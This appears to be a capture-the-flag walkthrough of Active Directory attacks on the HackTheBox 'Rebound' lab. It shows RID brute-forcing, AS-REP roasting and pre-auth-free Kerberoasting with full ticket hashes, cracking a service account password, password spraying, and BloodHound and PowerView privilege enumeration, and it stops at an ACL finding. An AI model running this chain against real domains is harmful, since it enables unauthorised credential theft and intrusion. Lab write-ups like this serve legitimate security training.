Rebound

Recon

nmap_scan.log

SMB

└─$ netexec smb rebound.htb -u 'guest' -p '' --shares
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.114  445    DC01             [+] rebound.htb\guest:
SMB         10.129.229.114  445    DC01             [*] Enumerated shares
SMB         10.129.229.114  445    DC01             Share           Permissions     Remark
SMB         10.129.229.114  445    DC01             -----           -----------     ------
SMB         10.129.229.114  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.229.114  445    DC01             C$                              Default share
SMB         10.129.229.114  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.229.114  445    DC01             NETLOGON                        Logon server share
SMB         10.129.229.114  445    DC01             Shared          READ
SMB         10.129.229.114  445    DC01             SYSVOL                          Logon server share
└─$ smbclient -U guest //10.129.229.114/Shared
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug 25 17:46:36 2023
  ..                                  D        0  Fri Aug 25 17:46:36 2023

                4607743 blocks of size 4096. 1021377 blocks available

Enumerate Users

We can try enumerating for users with RID Bruteforce enumeration.

└─$ netexec smb rebound.htb -u 'guest' -p '' --rid-brute 10000 | tee rid-brute.log
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.114  445    DC01             [+] rebound.htb\guest:
SMB         10.129.229.114  445    DC01             498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.229.114  445    DC01             500: rebound\Administrator (SidTypeUser)
SMB         10.129.229.114  445    DC01             501: rebound\Guest (SidTypeUser)
SMB         10.129.229.114  445    DC01             502: rebound\krbtgt (SidTypeUser)
SMB         10.129.229.114  445    DC01             512: rebound\Domain Admins (SidTypeGroup)
SMB         10.129.229.114  445    DC01             513: rebound\Domain Users (SidTypeGroup)
SMB         10.129.229.114  445    DC01             514: rebound\Domain Guests (SidTypeGroup)
SMB         10.129.229.114  445    DC01             515: rebound\Domain Computers (SidTypeGroup)
SMB         10.129.229.114  445    DC01             516: rebound\Domain Controllers (SidTypeGroup)
SMB         10.129.229.114  445    DC01             517: rebound\Cert Publishers (SidTypeAlias)
SMB         10.129.229.114  445    DC01             518: rebound\Schema Admins (SidTypeGroup)
SMB         10.129.229.114  445    DC01             519: rebound\Enterprise Admins (SidTypeGroup)
SMB         10.129.229.114  445    DC01             520: rebound\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.229.114  445    DC01             521: rebound\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.229.114  445    DC01             522: rebound\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.229.114  445    DC01             525: rebound\Protected Users (SidTypeGroup)
SMB         10.129.229.114  445    DC01             526: rebound\Key Admins (SidTypeGroup)
SMB         10.129.229.114  445    DC01             527: rebound\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.229.114  445    DC01             553: rebound\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.229.114  445    DC01             571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.229.114  445    DC01             572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.229.114  445    DC01             1000: rebound\DC01$ (SidTypeUser)
SMB         10.129.229.114  445    DC01             1101: rebound\DnsAdmins (SidTypeAlias)
SMB         10.129.229.114  445    DC01             1102: rebound\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.229.114  445    DC01             1951: rebound\ppaul (SidTypeUser)
SMB         10.129.229.114  445    DC01             2952: rebound\llune (SidTypeUser)
SMB         10.129.229.114  445    DC01             3382: rebound\fflock (SidTypeUser)
SMB         10.129.229.114  445    DC01             5277: rebound\jjones (SidTypeUser)
SMB         10.129.229.114  445    DC01             5569: rebound\mmalone (SidTypeUser)
SMB         10.129.229.114  445    DC01             5680: rebound\nnoon (SidTypeUser)
SMB         10.129.229.114  445    DC01             7681: rebound\ldap_monitor (SidTypeUser)
SMB         10.129.229.114  445    DC01             7682: rebound\oorend (SidTypeUser)
SMB         10.129.229.114  445    DC01             7683: rebound\ServiceMgmt (SidTypeGroup)
SMB         10.129.229.114  445    DC01             7684: rebound\winrm_svc (SidTypeUser)
SMB         10.129.229.114  445    DC01             7685: rebound\batch_runner (SidTypeUser)
SMB         10.129.229.114  445    DC01             7686: rebound\tbrady (SidTypeUser)
SMB         10.129.229.114  445    DC01             7687: rebound\delegator$ (SidTypeUser)
└─$ grep SidTypeUser rid-brute.log | awk '{split($6, a, "\\"); print(a[2])}' | tee users.txt
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$

kerberoasting

asreproast

Now that we have users we can try to asreproasting

└─$ netexec ldap rebound.htb -u users.txt -p '' --asreproast output.txt
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP        10.129.229.114  445    DC01             $krb5asrep$23$jjones@REBOUND.HTB:d8cbf8f2307383cff384448cec807eea$5764c7fda80c8a9b05f2c609cfb1f779c0ec5cb16e72e198a5466ff39c74ca844ee06785f37e57e641639ee1c28fba14d26f1cf90f5a0a3bb7e4f55484d834a212542eaa461533d4d5c7d587cc546b4e826d0a2ed9fb614e7fd63d4ef1b934e51055f86a5c2d40549aaa04a0ee85a1816a8475b9f39babab9c07ddac456fecf95f386de4faddbfce6f03c90d26bcca8a31e676fe5c449616673bcf07a34558d8b6338e3ccbfb6f23a6b512a37efbb8e8c3edda7474ff86f92c0fc45d26f67a4ee6dc8aef1fb053d7398a2f671b968cf40c85ae2c3e783d7152a9466562b540f90b57fd733a13694d6505

It's not crackable

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:13 DONE (2024-11-30 23:36) 0g/s 1068Kp/s 1068Kc/s 1068KC/s !)()45jlr..♦*♥7¡Vamos!♥
Session completed

NoPreAuth

We can try NoPreAuth kerberoasting

https://www.thehacker.recipes/ad/movement/kerberos/kerberoast#kerberoast-w-o-pre-authentication

└─$ impacket-GetUserSPNs -no-preauth "jjones" -usersfile "users.txt" -dc-host "10.129.229.114" "REBOUND.HTB/"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$d7c4dbecd2025e733074c2f2$47db4fcb86ca7513a8d3097821353ce1399f416f17cabad6f9a3228c4fe83a86efeb16a879873ca1faf8d853dea022ff0df16f7531b36e842e0cf15e37a429b4ad54cd9c4a395fd66fde27fdb986a95e0c4714b6ab216ac893c73b9309116e803e4a2b7d027e4c6a064a573ae89d12ce367a9c140965b0284192e38cd8600b23785fc5d147521622012db03fecfff9a7e7658811ca7a0ce2a1a7295d3fe7a5b712b0934a3634b81297b5c006c9e8ddc11428194d7d1cf2fb5f88cd6a7d3c06801d6a4a99fa08eecf1cc1ad3d3f049ca906c3fa944cc219b7a667568f2cd41cfc1e77dba64893e38fedeab33b81d201ef6c87fa0366f8ff78eddaea128cbf555c71f5c845fad12f761b1bcdd80a0a32edf6764333f8f35495f5550a447a5b1c3e96aa60bb7919ce3ee66708768896524ea3677265f9329a4d9d0ad3d0e4449c43f7600d5fcfa0df487d162ff4a9f71b43aeb8630771f62d0fefd6e1b9060de1972c0c5b250ae0a40ecaf3f697b0ddd69e9bc583a89598cfe30a84559e9b7e5570696830425e74583ba914a022cdd107d12a602fdc28cc63f6cc65ab9455d24e5276163e9ecaffe35054395bd3cdaeaa6e0fe985344c29dc3d28f45020126f16ad8e6b75e633c1ff53dba2572ae2920ba580e58496882b5551a6da293267f347b18a4387253a033682175cd7ff8acf3fff4fdf0c4f48a363af7c84c0a5a1c60e661cdd6b934aad571f9f79ac221d77e9693b4b0ae821b97094e1a54cfb394e54b84377c8c07a9e896cc8115c6a9d59afb70d369d54413bc7509c8f01dd4e9975e19ff457012409fab53f31b9c71cd6b4871704508c5a448f74820f6a5f5b500f98d538e5da5f176e57e0de9763507c4058771feae89377ad23bfd4c23f9a041b8473817eabcffd2a1e1954c75c86b66da0f251cc416b2b6cd5907b2ae8c66800d3a2fa6add26018b97dc7a873d7304a4d4d312ab9beb2f736f74545065bc7510120221d8d23fa48e7c8b5b370cadd86e8de1e83d7131ec372c92fe1d31c2c8890d31665647fe76a8b5186e3e0b17c2dc16a79570a1eb1bbcfca0b7cc254afbfd8e8c47cf2c8bbb05eb48fb50e442be25a88b5ba5218bb37940314284efcb73a0b03fbe57ea3073d0af1d1d42aca68e3f04aa78e46e5fb9401426708d61e69f723e88d0ea3ae48ff4bdd25fd7eab51b3efe0840335035f535075a54f4a46843434e6d9dfdfac57c6fee23decc8eef3ee73e2e3be3ac361fcc4dcf65bdd49e61cbed74544a9626773106c4f12255e02434312ff05a673c8f56f86191945d628ddfc889357173dbc1dd5cef6e56ac85a76da6a642f53ac02059a1496aa22796eb45add840664b4f67e6f8d79b241674ce95d1b62c8270d4ecd698eb1d9392074d01f0575292ab301ab5adfa8aa0312e7b6dfc6fbfec5bf5298e71664
2b7143338bf9ffc10ad6991f0410532a526dbceec2c273561
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$0c67989666e1bd2b097e5c42$5267f1e3d72894bef8941492bebf6948f95539ca77fc1ae61f28905fb2522d950d10d4d51d2d3fab1cbaf4e8c011ec8f48f9158dc02642956e45d26392f0d7c8f9b54e069ce524989975f8dafd5521e426f8b2bc831b055b664daa13de677c253a5a5f469670ddeb05b8458a2de43fc1cc4a74f9e4d6b3fc671d8007373a1377a3f255f337035a90e3c7a903851f2b3e0e5c0821d781a9db2725e182696cb0582492481b8a02e7355803d0b357de191b8893aa6ef268e5ba06322c730ffdde9cbffe73eaa7cd850ec6ef927f6c9dc6ad1a9e0ed800d0ae871e9e5ce3cc98be344627249375e13b7d8f0a890603c7b4002d109fb0f8ff36c7c6cab01652fb9dabb08f2f46ca8182049a3b3e4fafb70486e419b6b8f3d1f6824a0d5dd092d88a18bd095c3565575ee9fd7e109250829da25719919edce99a1b4aa62e2ba94fd08acf3433172ae50e4c9d7755db90f6abe752eea35210c1325d6ef72c212da7f2183d08283bd936b66df43213719b715ac96fd0478cdecebcb322b222eeb6400abd2a08b672c30e2d5e37267ca5911385b6471538a7086fe7f8457202f830fd424ccbf1d155f1d4ab5ab41c6ad70d68e65c54ab5dc3e6d2cda544de27b3da1b98d3fb8e3ef04b79537abe54254d94709c1344697c4147cd064ad96c68ae0e8bd49f3bef4f139b72d23c3b0b04024b9a65e782b6568913265b2f2a34fba67a9f439b8e956628786cf1bd614aff02cea5195bb0c2fa5bcc70858f4c6e17a1d221abed94d935c01370c286439cb70b40ec3cfa3c9245b1de5f412539c248aa71b130900d2e38d913efdbfa1a57702b72f203b88bda47ecfd0b218bcd6fc4f6f5f67d1d05f212da7b27996ebf8d854b5af27968b5121845f166646613aed056403f5fa7a225f3af0db9884b25f1cc1fe64602b41bc6bc1a83e4ec237612d5946b4c260cba202cf4052131aa5638bb1e44aecdb0a0baec95455f5c2aed6e1e5876516192eb3ed178d4786eba5da587d6104e10bde8a0344b543076a9794d6d2748cf7b61d4ed40ca5749df95e47c605f40a8790fbb0d8339717d4dd6eb5f28aaa150412dc88954c0f50e7fae79b066aeeb82479d1edb4611dffbad88b0b3adbb08fe07d1fd3639a1a2afc2d0c497c9b96b8cb6293ef9cc2145fce3a2cd854956e1b5a75a899a636955238bade4f9b1f2fab431c896b28218cf88696c3cfe8f36bacd36a360ffa5688d2df6a25b17f35382bac522918b54878c3496189d2fdcd89f075b7289999756b2ea7f943c5ffb10aaf656a7d329b2c00c93e086d9d9166380bf0106888650e358dbe107f57009489160565593a38f951cf65947ac4ba44f1994cb82ca33f6080648d3fc426e
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$a1f9c6917ccfeb278194d64728c8f4bd$14962fbb6590baf495ae6e4eaac9d9da714263e0ae2c423c07b688505208c4ca9887eae1840d3671680fea5dd606a8166c8fe88d26abe799bb5508b7d5473486c6102272d99182836c8f0e9bdfdd775c93935d9cb2be95377f16f808d038bf9267c2871c52626fe1b953f8c2c5a14ecf7af0faf80e4a9983a2a3ce8a377eed2c244269cfb1879a82a8badc016acb2d5302058ae3ee0dde7abb0ee5a98aef9b9f81b0c6a05b83bb33fa24ce73f06106d7a61b1c1b117d6be1fd7397f4506c010483f065d7a010dafb93259e443869a400ef3d5f4cab0e7621cdd78a1613c5815ccae0b1556b2ac31b36f7135ac0eb24ebfcc1fbbad837bed76e7f96ef940a01922675f27d856308f76c6c8a508f21caf6faca3994abeb6f90233405f4a159c41ac5e40f9d627268acee30c6db5ec4c8b5496c71085e89f1d3683951921b313167ca12880b1b0772410becd3dc3e82bd45c072aabc826897de3222f287a5ce1eac1fb48a074938f45b419499ef7b89c998b787efdcefe4b0a8009287e4bc290354ca29f3a8bf0e678e362a0c049bc0aa4e55ac3f133911d48c08b934f5526549f2a6c6b1cfcc05962b4636994742771ed9964da420869a0bf7c48cd4f828b65b6f19fab6f93ec2b714c6c5f7525d0fb858981cba100d45cfbd740f970e820b5fb8c6e19ba413455010dac6a02aa6adb2abdd39666041687076dfd3241ea6802fbf6d431cd3fd7e0d83eca043d30fb52f969f7b47a9330b9a8c1a101e2dd2b522e6efa84c118350c67e22c0f2beed7e61a60c071c921eee13abaef2cef97f7e169e9735b254054b9ac49de8c297dadc5760f8c515f0f99019d25ae70a53efca601dd3a4597d893c2091e764115b9ddea7186a771f08c749e47ad280ccc0135fb156b0a1bd0fa4e7743c7ce6fdc24bcd23cce38875e58802b339f4d62241fe8bfc14f837cde51f39f945b68643cb3e4b9bd36bee93afd8752573690350715c6fded7999850b346a7f5b63e7f90bf0d2c9e2233cfb41a006d1b58453e0890240b4c7ba3376ba3c2f3dc98688c42a0a0d9a8c80ba0f65e052a6d324941c3fb34957872b1e19a1e6e2e5aa20d5330a6841e14cf23791a9e164c2b9c2637df4c57539032b3107d76417a9db8b9d710f3072eeb0288c4d45380b18834ff8189a1c3b325817f1d2e025b6075dbf7da7058becda44721c357a38a7665cce70d5afe920f405c63dcbccf685136df94aa665adeb83a856b271e83687b8ccb2d167f79ceb5c67493cc8430997f7f819dacbba5b4d11c27a02dddf2b82a291b51a3883500b1bb386ed7e16bcfaac3ad28afb588ee0084e58113ba2dc016aab615108f463f53c0f968e8
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$0eb940ce99443af6c8109361$5f5c1bee2a5bc7bc37950876ba0990c2cc016753ed94727adbf61e26e84b8246da6f6be277cf531ff6e329256488087b532ec6776e66138e83789ba39a5d88aa1c3c39c2bdb787f3eb1736e4c23542e1a2ebfc63a73c185ef5b64254cd0bac755ed7912b34e53bfa8b15864b8d04dc91e62941a11574c2a3d259e34797071175dda8393ba4c1b78194894bddfda288e96e58dbf11ea3df9067d1cfe9ee1c8d1cf2a58378a9984e089c872dd73b76d4be7e4c93cdb8f76d79380d0e698f436fbd23684670814ef73cdd24c83576cfc8b49538170be309febf456d3e765ddb25a8e9aa7e2e87af22273e99273e964e9ab02cb0f39319325755808583e73de00479317e5e257cf732ebaf74518f16c7b1ef256669b1cedfdda9e5157ee0c7412ab7b6d7ed243eb8c289115171a95222b2f85a97e39bb807d3471fc24b40764160b9c8a3eeca795a5d7f334fc37c7f066a842fed1da0636910e86d50ed5243cc049137981473a2638939789b5ff06113935149680b6d4e24645fe9a5afe00404d56b515b6e8e7302fe7f426f2cac47f41372dbdbf03e5184f6e3698390e37bfe8954494bec0b380067d767a1796c9a19115a9cbbcbe4b1be6207c370b7ce5a697856f398076fcf21f0f1e1116dc0551fcbe7da99d16ceaaff15b02a2650914411e2b86527026b9ba31d3081dd79d0234cadc3e511a597f148af61d003753c182dfc6f8905fb15a60b5bed60e6a454d2fe133e6763808847b052ef4105f19f00748e4a0ae4855da639fcbc43856e7b9e95bd794868fd20c7d13d840e7754b248d009fa34c0eeaebd9e65cdadb206268ff2b9864c1a5b5c8f9eae25c5d7de7a09f1a5adc80d5384fba96048429805eab253218ae9265dc780d90319f0180c895d9a54da55344ec6ddc15b5003f2f0a7af526cc19271c684b8b983ff50746f983cd9a7040a3699ebd68c9071ef7a345985c903b2356cf5ff3ac09fd6fb640fd607c8ee60174aaf3ea2a37d668125d6e6539d93fb3ef2c6f6043810c18c1a700399ba7a4efaa75715605de512d092475f20085ac59e30647897b6e58e9da15cab5feb6e3ba2d17cb01b2633687c871c74087ca12e2e31ebaf00f3ab3799406c239a843260ee74ca54199443d51847fc76b1d7264d41938f697ed9cb5422b3f3bee0989f1c43cc0a4e9b79f19874eaa53cbfd3362fe05b2af32f0f296b6b2a82a6f3c9c243af30dc6353d54adf6f062b554491c48c3e4428814f90bd4fbc0d4858490b78d23d3e593d2097db720a0b4f8d8da60208c74236a8611ead7440234f6c7c7b70bdf7a2d27fe4f7d89ee8ee666fd01a0b6075953d0233703d1acd37ba89466b728db86683ea41ae7727433

John didn't even start hashes with $18$, $23 ldap_monitor was cracked:

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1GR8t@$$4u       (?)
1g 0:00:00:06 DONE (2024-11-30 23:47) 0.1429g/s 1864Kp/s 1864Kc/s 1864KC/s 1Goatrope..1BLAYDE
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Creds: ldap_monitor:1GR8t@$$4u

Nothing useful from SMB, just some policies.

└─$ netexec smb 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u' -M spider_plus -o DOWNLOAD_FLAG=True

We are able to login into LDAP with Kerberos, but we must fix clock skew.

└─$ netexec ldap 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u'
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.229.114  636    DC01             [-] rebound.htb\ldap_monitor:1GR8t@$$4u
LDAPS       10.129.229.114  636    DC01             [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.
└─$ netexec ldap 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u' -k
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP        10.129.229.114  389    DC01             [-] rebound.htb\ldap_monitor:1GR8t@$$4u KRB_AP_ERR_SKEW
└─$ sudo ntpdate rebound.htb
2024-11-30 22:00:46.814197 (-0500) +25979.048967 +/- 0.045110 rebound.htb 10.129.229.114 s1 no-leap
CLOCK: time stepped by 25979.048967
└─$ echo $(( 25979.048967 / 3600 ))
7.2164024908333326
└─$ faketime -f +7h netexec ldap 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u' -k
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.229.114  636    DC01             [+] rebound.htb\ldap_monitor

Bloodhound

Enumerate AD with Bloodhound.

└─$ faketime -f +7h bloodhound-python -u 'ldap_monitor' -p '1GR8t@$$4u' -d rebound.htb -k -ns 10.129.229.114 --dns-tcp --dns-timeout 100 -op ldap_monitor --zip
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: User with SID S-1-5-21-4078382237-1492182817-2568127209-7686 is logged in on dc01.rebound.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20241201181052_bloodhound.zip

No special privileges on this user

Writeup.png

This user can't do much.

Sometimes user's may have same passwords:

└─$ netexec smb 10.129.229.114 -u users.txt -p '1GR8t@$$4u' --continue-on-success
SMB         10.129.229.114  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.114  445    DC01             [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u
SMB         10.129.229.114  445    DC01             [+] rebound.htb\oorend:1GR8t@$$4u
SMB         10.129.229.114  445    DC01             [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.129.229.114  445    DC01             [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE

Creds: oorend:1GR8t@$$4u

Update bloodhound

└─$ faketime -f +7h bloodhound-python -u 'oorend' -p '1GR8t@$$4u' -d rebound.htb -k -ns 10.129.229.114 -op oorend --zip

Bloodhound surprisingly is showing nothing 🤔

💀Skill issue, I forgot to use -c all.... all collection method fails because of ObjectProps 💀, run without it.

└─$ faketime -f +7h bloodhound-python -u 'oorend' -p '1GR8t@$$4u' -d rebound.htb -k -ns 10.129.229.114 --dns-tcp --dns-timeout 100 -op oorend --zip -c Group,LocalADmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos        # <----------
INFO: Found 2 ous         # <----------
INFO: Found 19 containers # <----------
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: User with SID S-1-5-21-4078382237-1492182817-2568127209-7686 is logged in on dc01.rebound.htb
INFO: Done in 00M 20S
INFO: Compressing output into 20241201181255_bloodhound.zip

Following oorend user Outbound Permission I ended up on winrm_svc user (there's also batch user, but it can't Remote PS) who can use winrm, meaning we can get shell on the box. But what Service Users group is unknown to me for now... After some searching it doesn't seem like a builtin role.

Writeup-1.png

Powerview Enumeration

We can try to enumerate with powerview

└─$ faketime -f +7h powerview rebound.htb/oorend:'1GR8t@$$4u'@10.129.229.114 --dc-ip 10.129.229.114 -k
Logging directory is set to /home/woyag/.powerview/logs/10.129.229.114
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainUser ldap_monitor
cn                                : ldap_monitor
distinguishedName                 : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
name                              : ldap_monitor
objectGUID                        : {cf7691bd-5b32-407d-9d42-262013f10288}
userAccountControl                : NORMAL_ACCOUNT [66048]
                                    DONT_EXPIRE_PASSWORD
badPwdCount                       : 0
badPasswordTime                   : 04/08/2023
lastLogoff                        : 0
lastLogon                         : 12/01/2024
pwdLastSet                        : 04/08/2023
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-7681
sAMAccountName                    : ldap_monitor
sAMAccountType                    : 805306368
servicePrincipalName              : ldapmonitor/dc01.rebound.htb
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
msDS-SupportedEncryptionTypes     :

PV > Get-DomainUser oorend
cn                                : oorend
distinguishedName                 : CN=oorend,CN=Users,DC=rebound,DC=htb
name                              : oorend
objectGUID                        : {edb118e8-3995-45d9-89f1-bf978e4e7fa4}
userAccountControl                : NORMAL_ACCOUNT [66048]
                                    DONT_EXPIRE_PASSWORD
badPwdCount                       : 0
badPasswordTime                   : 04/09/2023
lastLogoff                        : 0
lastLogon                         : 12/01/2024
pwdLastSet                        : 04/08/2023
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-7682
sAMAccountName                    : oorend
sAMAccountType                    : 805306368
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
msDS-SupportedEncryptionTypes     :

Get information about Access Policies for user

PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7681
[2024-11-30 23:10:37] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2024-11-30 23:11:00] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Self
AccessMask                  : 0x8
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

The user oorend has Self permissions on the ServiceMgmt object (CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb). This means oorend can modify certain attributes of ServiceMgmt, potentially enabling privilege escalation by resetting credentials or modifying SPNs.

PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7683
[2024-11-30 23:26:31] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : None
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : 0xf01ff
InheritanceType             : None
SecurityIdentifier          : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)

